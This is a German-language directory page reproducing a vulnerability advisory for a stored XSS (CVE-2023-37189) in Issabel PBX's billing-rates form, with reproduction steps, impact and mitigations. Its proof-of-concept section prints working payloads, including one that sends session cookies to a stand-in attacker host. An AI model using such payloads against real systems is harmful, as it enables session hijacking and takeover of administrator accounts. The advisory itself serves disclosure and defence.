Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-37189 — Eine Schwachstelle in Form von gespeichertem Cross-Site-Scripting (XSS) existiert in Issabel PBX Version 4.0.0-6 auf der Seite zur Verwaltung von Abrechnungstarifen (index.php?menu=billing_rates). | Kitploit
Tools/GitHubGitHub/sahiloj/cve-2023-37189
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubsahiloj/cve-2023-37189

CVE-2023-37189

Eine Schwachstelle in Form von gespeichertem Cross-Site-Scripting (XSS) existiert in Issabel PBX Version 4.0.0-6 auf der Seite zur Verwaltung von Abrechnungstarifen (index.php?menu=billing_rates).

Repository anzeigen
111vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-37189 — Gespeichertes Cross-Site-Scripting (XSS) in Issabel PBX 4.0.0-6

CVE Severity Type Vendor


Übersicht

FeldDetails
CVE-IDCVE-2023-37189
VerwundbarkeitGespeichertes Cross-Site-Scripting (XSS)
Betroffenes ProduktIssabel PBX 4.0.0-6
Betroffene URLindex.php?menu=billing_rates
Verwundbare FelderName- und Prefix-Felder im Modul Create New Rate
SchweregradMittel (CVSS 3.1 Basis-Score: 6.1 — AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
Gemeldet am07. Juli 2023
Entdeckt vonSahil Ojha
Getestet aufWindows
Hersteller-Webseitehttps://www.issabel.org/
Quellcodehttps://github.com/IssabelFoundation/issabelPBX

Beschreibung

Eine gespeicherte Cross-Site-Scripting (XSS)-Schwachstelle existiert in Issabel PBX Version 4.0.0-6 auf der Verwaltungsseite für Abrechnungstarife (index.php?menu=billing_rates).

Issabel PBX ist eine weit verbreitete Open-Source-Plattform für Unified Communications, die auf FreePBX/Asterisk aufbaut. Die Funktion Billing → Rates ermöglicht Administratoren, Anruftarifeinträge mit einem benutzerdefinierten Namen und Präfix zu definieren. Aufgrund unzureichender Eingabebereinigung und Ausgabekodierung kann ein authentifizierter Angreifer beliebiges HTML oder JavaScript in eines der Felder injizieren. Das schädliche Skript wird dann dauerhaft in der Anwendungsdatenbank gespeichert und automatisch ausgeführt im Browser jedes Benutzers, der anschließend die Rates-Seite besucht – einschließlich anderer Administratoren – ohne zusätzliche Interaktion.

Diese Art von Schwachstelle ist in Administrationspanels besonders gefährlich, weil:

  • Sie kann verwendet werden, um Sitzungs-Cookies anderer Administratoren zu kapern, was zur vollständigen Kontoübernahme führt.
  • Sie ermöglicht Phishing-Angriffe, indem das Erscheinungsbild der den Opfern ausgelieferten Seite verändert wird.
  • Sie kann CSRF-Token-Diebstahl, Keylogging oder Umleitung auf bösartige Websites erleichtern.
  • Die Nutzlast bleibt bestehen, bis sie explizit entfernt wird, was bedeutet, dass sie im Laufe der Zeit eine unbegrenzte Anzahl von Opfern betreffen kann.

Details zur Schwachstelle

  • Schwachstellenklasse: Gespeichertes (Persistentes) Cross-Site Scripting (CWE-79)
  • Angriffsvektor: Netzwerk
  • Authentifizierung erforderlich: Ja (authentifizierter Benutzer mit niedrigen Rechten oder Administratorkonto)
  • Benutzerinteraktion: Erforderlich (Opfer muss die Billing-Rates-Seite besuchen)
  • Umfang: Geändert (Angreifer kann die Browsersitzungen anderer Benutzer beeinflussen)
  • Grundursache: Fehlende HTML-Kodierung/Ausgabebereinigung der Felder Name und Prefix beim Rendern gespeicherter Werte auf der Seite.

Nachweis (Proof of Concept)

Die folgenden Payloads, wenn sie in das Feld Name oder Prefix des Formulars Create New Rate eingegeben werden, demonstrieren die Schwachstelle:

Einfacher Alert (Funktionsprüfung):

root@kitploit:~
<script>alert('XSS')</script>

Sitzungs-Cookie-Diebstahl (ersetzen Sie attacker.example.com durch einen Server, den Sie besitzen und den Sie verwenden dürfen – testen Sie niemals echte Benutzer oder Systeme):

root@kitploit:~
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

Bildbasierter onerror-Payload (WAF-Umgehung):

root@kitploit:~

⚠️ Hinweis: Diese Payloads werden ausschließlich zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt. Holen Sie vor dem Testen auf einem System, das Ihnen nicht gehört, immer eine ordnungsgemäße schriftliche Genehmigung ein.


Schritte zur Reproduktion

  1. Melden Sie sich mit einem Administratorkonto an der Issabel-PBX-Weboberfläche an.

  2. Navigieren Sie zu Reports → Billing → Rates (URL: index.php?menu=billing_rates).

  3. Klicken Sie auf "Create New Rate" und geben Sie einen manipulierten XSS-Payload entweder in das Prefix- oder Name-Feld ein.

    Schritt 2 – Injizieren des Payloads in die Name-/Prefix-Felder

  4. Klicken Sie auf Save. Der Payload ist nun in der Datenbank gespeichert.

  5. Jeder Benutzer (einschließlich anderer Administratoren), der die Billing-Rates-Seite besucht, wird das Skript automatisch ausgeführt haben in seinem Browser.

    Schritt 3 – Payload wird beim Seitenladen ausgeführt

    Schritt 3 – Sitzungs-Cookie abgefangen


Auswirkungen

  • Sitzungsentführung: Angreifer können Sitzungs-Cookies stehlen und andere Benutzer oder Administratoren imitieren.
  • Privilegienerweiterung: Durch die Entführung einer Administrator-Sitzung kann ein Angreifer mit niedrigeren Rechten die vollständige administrative Kontrolle erlangen.
  • Datencxfliltration: Vertrauliche Informationen, die auf der Seite sichtbar sind, können stillschweigend abfließen.
  • Persistente Hintertür: Der Payload bleibt aktiv, bis er manuell entfernt wird, was diese zu einer dauerhaften Bedrohung macht.

Eindämmung / Behebung

Dem Hersteller und den Systemadministratoren wird empfohlen, die folgenden Gegenmaßnahmen anzuwenden:

  1. Ausgabekodierung: Wenden Sie kontextabhängige HTML-Kodierung an, wenn gespeicherte Werte zurück in die HTML-Seite gerendert werden (z. B. Verwendung von htmlspecialchars() in PHP mit ENT_QUOTES). Dies ist die primäre und zuverlässigste Verteidigung gegen XSS.
  2. Eingabevalidierung: Als sekundäre Defense-in-Depth-Maßnahme lehnen Sie benutzereingegebene Eingaben serverseitig ab oder bereinigen Sie diese. Entfernen oder kodieren Sie HTML-Sonderzeichen (<, >, ", ', &) vor dem Speichern von Daten. Beachten Sie, dass die Eingabevalidierung allein umgangen werden kann und nicht als alleinige Kontrolle verwendet werden sollte.
  3. Content Security Policy (CSP): Setzen Sie einen strengen Content-Security-Policy-HTTP-Header ein, um die Ausführung von Inline-Skripten einzuschränken.
  4. Web Application Firewall (WAF): Verwenden Sie eine WAF mit XSS-Erkennungsregeln als Defense-in-Depth-Maßnahme.
  5. Regelmäßige Sicherheitsaudits: Führen Sie regelmäßige Code-Reviews und Penetrationstests für alle benutzergesteuerten Eingabefelder durch.

Referenzen

  • NVD – CVE-2023-37189
  • MITRE CVE – CVE-2023-37189
  • OWASP: Cross-Site-Scripting (XSS)
  • CWE-79: Unzureichende Neutralisierung von Eingaben bei der Generierung von Webseiten
  • Issabel PBX – Offizielle Website
  • IssabelFoundation/issabelPBX – GitHub

Haftungsausschluss

Dieses Repository und die darin enthaltenen Informationen werden ausschließlich zu Bildungs- und Sicherheitsforschungszwecken bereitgestellt. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch die bereitgestellten Informationen verursacht werden. Holen Sie vor der Durchführung von Sicherheitstests immer die ausdrückliche schriftliche Genehmigung des Systembesitzers ein.


Entdeckt und gemeldet von Sahil Ojha

Tool herunterladen